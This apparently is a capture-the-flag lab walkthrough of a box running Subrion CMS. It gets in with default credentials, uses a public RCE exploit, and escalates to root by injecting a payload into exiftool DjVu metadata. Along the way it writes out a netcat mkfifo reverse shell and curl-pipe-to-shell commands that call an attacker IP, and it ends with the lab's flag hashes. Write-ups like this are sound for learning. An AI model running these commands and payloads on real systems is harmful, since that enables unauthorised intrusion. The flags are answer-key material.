NETWORK
ENUMERATION
Using the default credentials admin / admin we find ourselves in the admin panel
FOOTHOLD
RCE on Sublion CMS
Using the following script https://github.com/h3v0x/CVE-2018-19422-SubrionCMS-RCE we have RCE on the server
PRIV ESCALATION
Better shell
mkfifo /tmp/lol;nc 192.168.49.74 4444 0</tmp/lol | /bin/sh -i 2>&1 | tee /tmp/lol
On the victim machine we can call our script
curl -sL http://192.168.49.74/reverse.txt|sh
and we get a better reverse shell
Abusing Exiftool
Let’s exploit exiftool
First let’s create an exploit file
(metadata "\c${system ('curl http://192.168.49.74/reverse.txt | bash')};")
and also an exploit.djvu file
sudo apt-get install djvulibre-bin
djvumake exploit.djvu INFO=0,0 BGjp=/dev/null ANTa=exploit
Let’s upload this file on the victim server
Let’s wait for the crontab to run and we get root access
# proof.txt
715d3991ed443efbd69fd4eb688c3e85
# local.txt
cfea5e9ab955c4c020c615fab5381578